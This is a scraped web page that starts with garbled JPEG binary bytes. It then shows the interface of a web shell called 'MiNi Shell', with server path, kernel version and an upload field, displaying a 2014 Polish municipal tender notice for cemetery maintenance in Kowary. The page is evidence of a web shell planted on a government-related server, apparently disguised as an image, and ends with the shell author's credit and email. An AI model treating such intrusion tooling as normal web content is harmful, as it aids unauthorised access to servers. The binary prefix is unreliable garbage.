JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140611/197830-N-2014.html

<p class="kh_header"><b>Kowary: Utrzymanie i eksploatacja cmentarzy na terenie miasta Kowary</b><br>
<b>Numer ogłoszenia: 197830 - 2014; data zamieszczenia: 11.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Kowarach , ul. 1-go Maja 1a, 58-530 Kowary, woj. dolnośląskie, tel. 075 718-24-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kowary.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i eksploatacja cmentarzy na terenie miasta Kowary.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest utrzymanie i eksploatacja:
a) Cmentarza Komunalnego położonego przy ul. Staszica, wraz z utrzymaniem kaplicy cmentarnej w Kowarach (działka nr 348; obręb 1; pow. 14 648 m2), 
b) Cmentarza Komunalnego położonego przy ul. Matejki, wraz z utrzymaniem kaplicy cmentarnej w Kowarach (działka nr 17,18, 20, 21, obręb 4; pow. 63 884 m2)
w okresie 36 miesięcy od dnia podpisania umowy.
Do obowiązków Wykonawcy w zakresie utrzymania i eksploatacji cmentarzy należeć będzie:
1. w odniesieniu do Cmentarzy Komunalnych przy ul. Staszica i ul. Matejki :
1.1. utrzymywanie kaplic zlokalizowanych na terenie cmentarzy;
1.2. posiadanie lokalu służącego do obsługi administracyjnej cmentarza i przyjmowaniu interesantów oraz przechowywania dokumentacji cmentarnej. Lokal ten winien być zlokalizowany w granicach administracyjnych Miasta Kowary i czynny w dni powszednie od godz. 8.00 do 16.00,
1.3. prowadzenie na bieżąco przeglądu drzewostanu, typowanie prac związanych z pielęgnacją i usunięciem drzew na terenie cmentarzy, informowanie Zamawiającego o zagrożeniach wynikających ze złego stanu drzewostanu;
1.4. w sezonie wiosenno - jesiennym przeprowadzanie w niezbędnym zakresie zabiegów pielęgnacyjnych krzewów, koszenie trawy (wymagana wysokość trawy - od 3 do 8 cm) przycinanie żywopłotów wraz z ich odchwaszczaniem oraz grabienie liści;
1.5. w sezonie zimowym - odśnieżanie oraz posypywanie piaskiem alejek, parkingów i dróg zlokalizowanych na terenie cmentarzy,
1.6. wyposażenie cmentarza przy ul. Staszica w kontenery na odpady w ilości nie mniejszej niż:
a. kontener o pojemności 1100 l - 2 szt.,
b. kontener o pojemności 240 l - 3 szt.,
c. kontener o pojemności 50 l  - 1 szt.,
d. kontener o pojemności 30 - 1 szt.;
1.7. wyposażenie cmentarza przy ul. Matejki w kontenery na odpady w ilości nie mniejszej niż:
a. kontener o pojemności 1100 l - 1 szt.,
b. kontener o pojemności 240  - 3 szt.,
c. kontener o pojemności 110 l - 1 szt.,
d. kontener o pojemności 70 l - 1 szt.,
1.8. utrzymanie czystości i porządku na obszarze cmentarzy oraz innych obiektów znajdujących się na terenie cmentarzy.
1.9. usuwanie dzikich składowisk śmieci w kwaterach na terenie cmentarzy oraz oczyszczanie terenu przyległego do cmentarzy;
1.10. ustawienie i opróżnianie przenośnych kabin WC - po 1 sztuce na każdym cmentarzu oraz ponoszenie kosztów z tym związanych;
1.11. ponoszenie stałych kosztów za zużycie energii elektrycznej, wody, odbiór ścieków i wywóz odpadów oraz z tytułu innych świadczeń wynikających z bieżącego utrzymania cmentarzy, w tym złożenie do właściwego organu deklaracji o wysokości opłat za gospodarowanie odpadami komunalnymi;
1.12. utrzymanie należytego stanu technicznego obiektów, urządzeń i instalacji znajdujących się na terenie cmentarzy poprzez:
a. zapewnienie systematycznej konserwacji oraz wykonywanie drobnych napraw,
b. prowadzenie ksiąg obiektów budowlanych oraz wykonywanie niezbędnych przeglądów i pomiarów;
1.13. przygotowanie cmentarzy do Święta Zmarłych poprzez:
a. zapewnienie dodatkowych kontenerów na odpady i wywozu odpadów w dniach poprzedzających Święto Zmarłych oraz w dniach następnych po Święcie,
b. utrzymanie w okresie Święta, z uwzględnieniem szczególnej staranności, porządku i czystości na terenie cmentarzy,
c. zapewnienie przenośnych kabin WC - minimum po 1 dodatkowej sztuce na każdym cmentarzu,
d. pełnienie w dniu Święta Zmarłych dyżurów przez pracowników Wykonawcy w godzinach od 7.00 do 18.00
1.14. prowadzenie księgi cmentarnej stosownie do przepisów ustawy z dnia 31.01.1959 r. o cmentarzach i chowaniu zmarłych oraz Rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 01.08.2001 roku w sprawie sposobu prowadzenia ewidencji grobów oraz innej dokumentacji wymaganej przepisami prawa, w tym również prowadzenie księgi w wersji elektronicznej w przypadku wprowadzenia stosownego oprogramowania przez Zamawiającego. Do księgi cmentarnej należy wpisywać dane osób, których zwłoki zostały pochowane:
a. nazwisko i imię,
b. płeć,
c. wiek,
d. ostatnie miejsce zamieszkania,
e. datę zgonu,
f. miejsce zgonu,
g. przyczynę zgonu,
h. datę i numer akt zgonu,
i. datę pochowania,
j. dokładnie określone miejsce pochowania według planu zagospodarowania cmentarza,
k. ewentualnie odnotowanie faktu wydobycia, daty i miejsca ponownego złożenia szczątków;
1.15. Wpisanie danych o osobach zmarłych, opiekunach grobów ze spisu i ksiąg zmarłych oraz  innych dokumentów będących w posiadaniu  zarządu cmentarza do programu elektronicznej bazy danych, oraz obsługa tego programu.  
1.16. koordynowanie oraz sprawowanie nadzoru w zakresie czynności wykonywanych przez podmioty gospodarcze świadczące usługi pogrzebowe na terenie cmentarzy;
1.17. porządkowanie istniejących miejsc pomiędzy grobami poprzez likwidację utrudnień w postaci np. łańcuchów, ławek;
1.18. pobieranie i ewidencjonowanie czynności wymienionych w zarządzeniu Burmistrza Miasta Kowary Nr 82/2003 z dnia 08.12.2003r. w sprawie zmiany Zarządzenia nr 75/2003 Burmistrza Miasta Kowary z dnia 17.11.2003r. w sprawie ustalenia regulaminu cmentarzy komunalnych oraz opłat cmentarnych, oraz przekazywanie pobranych opłat na konto Gminy Miejskiej Kowary. Uzyskane wpłaty z tytułu opłat cmentarnych przekazywane będą na konto Gminy do 7 dnia każdego miesiąca za miesiąc poprzedni. 
1.19 utrzymywanie w należytym stanie technicznym i sanitarno - epidemiologicznym oraz  dokonywanie nakładów połączonych ze zwykłym używaniem rzeczy tj. prosektorium przy ul. Matejki, oraz pobieranie opłat związanych z funkcjonowaniem prosektorium. 
1.20.sporządzanie i przekazywanie Zamawiającemu kwartalnych sprawozdań dotyczących realizacji bieżących zadań, w tym ponoszonych kosztów za zużytą energię elektryczną, wywóz odpadów, odbiór ścieków oraz innych świadczeń wynikających z bieżącego utrzymania cmentarzy;
1.21. sporządzanie i przedstawianie Zamawiającemu kwartalnej informacji o wszelkich pracach nie objętych przedmiotem zamówienia, a koniecznych do wykonania na terenie cmentarzy (m.in. pracach remontowych) 
1.22. wzywanie osób do opuszczenia terenu cmentarza w przypadku stwierdzenia zakłócania porządku.
1.23. wywieszenie do publicznej wiadomości na bramie głównej Cmentarza Komunalnego tablicy informacyjnej zawierającej:
a. aktualny cennik opłat 
b. godziny otwarcia i zamknięcia cmentarza,
c. regulamin cmentarza,
d. adres biura zarządcy wraz z telefonem kontaktowym;
1.24. ścisłe stosowanie i przestrzeganie przepisów:
a. ustawy z dnia 31 stycznia 1959 r. o cmentarzach i chowaniu zmarłych (Dz. U. Nr 23, poz. 295 z 2000 r. z późn. zm.),
b. rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 1 sierpnia 2001 r. w sprawie sposobu prowadzenia ewidencji grobów (Dz. U. Nr 90, poz. 1013 z 2001 r. z późn. zm.),
c. rozporządzenia Ministra Zdrowia z dnia 7 grudnia 2001 r. w sprawie postępowania ze zwłokami i szczątkami ludzkimi (Dz. U. Nr 153, poz. 1783 z 2001 r.) i innych obowiązujących przepisów.
1.25. standardy świadczonych w ramach niniejszego zamówienia usług określają ustawa z dnia 31.01.1959 r. o cmentarzach i chowaniu zmarłych i aktach wykonawczych do tej ustawy.

Dla pełnego oszacowania ceny za utrzymanie i eksploatację cmentarzy komunalnych  Zamawiający podaje dodatkowe informacje, które mają wpływ na dokonanie prawidłowej kalkulacji ceny:
średnioroczne zużycie energii elektrycznej na potrzeby własne Wykonawcy w związku ze świadczeniem usługi utrzymania i eksploatacji cmentarzy: około 16.000 kWh,
średnioroczne zużycie wody na potrzeby własne Wykonawcy oraz obsługę cmentarzy w związku ze świadczeniem usługi utrzymania i eksploatacji cmentarzy - około146 m3,
liczba pochówków na obydwu cmentarzach komunalnych w  2012 roku - 138
liczba pochówków na obydwu cmentarzach komunalnych w 2013 roku -  152
pobrane opłaty za korzystanie z cmentarzy w 2013 roku i przekazane na konto Gminy Miejskiej Kowary w wysokości - 91.920,00 zł..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 98.37.11.11-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu o udzielenie zamówienia jest wniesienie przed terminem składania ofert wadium w wysokości: 6.000,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożą oświadczenie o  spełnianiu warunków określonych w art. 22 ust. 1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykonali należycie w ciągu ostatnich 3 lat przed wszczęciem niniejszego zamówienia, a jeżeli okres prowadzenia jest krótszy - w tym okresie, co najmniej jedną usługę odpowiadającą swoim rodzajem usłudze będącej przedmiotem niniejszego zamówienia, przez co Zamawiający rozumie wykonywanie usługi utrzymania i eksploatacji cmentarza, nieprzerwalnie przez okres co najmniej 12 miesięcy z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, wraz z załączeniem dokumentów potwierdzających należyte wykonanie tych zadań ( np. poświadczenie ).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożą oświadczenie o  spełnianiu warunków określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożą oświadczenie o  spełnianiu warunków określonych w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>. posiadają opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający,
że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę minimum 50.000,00 zł wraz  z dowodem uiszczenia należnych składek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) pełnomocnictwo wystawione dla osoby składającej ofertę podpisane przez osobę upoważnioną do reprezentowania Wykonawcy, w przypadku składania oferty przez pełnomocnika, 
b) w przypadku składania oferty przez podmioty występujące wspólnie, do oferty należy dołączyć dokument ustanawiający przez wykonawców wspólnego pełnomocnika, 
c) pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów w zakresie wiedzy i doświadczenia oraz osób zdolnych do wykonania zamówienia na okres korzystania z nich przy wykonywaniu zamówienia, w sytuacji określonej w art. 26 ust. 2b ustawy, w przypadku kiedy Wykonawca powoła się na wiedzę i doświadczenie innego podmiotu, oświadczenie tego podmiotu zawierać winno zobowiązanie do udziału w wykonywaniu części udzielanego zamówienia w zakresie udostępnionego Wykonawcy potencjału.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany zawartej umowy o udzielenie zamówienia publicznego na realizację przedmiotowego zadania w zakresie terminu zakończenia świadczenia usługi w przypadku:
- zmiany przedstawicieli stron z przyczyn niezależnych od stron (siły wyższe, zdarzenia losowe, itp.),
- zmiany obowiązujących przepisów na podstawie których wykonywany jest przedmiot zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kowary.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Kowarach, 58-530  Kowary, ul. 1 Maja 1a, pok. nr 5 - budynek A)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.06.2014 godzina 09:45, miejsce: Urząd Miejski w Kowarach, 58-530  Kowary, ul. 1 Maja 1a, pok. nr 1-2 (Biuro Obsługi Klienta - budynek A)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com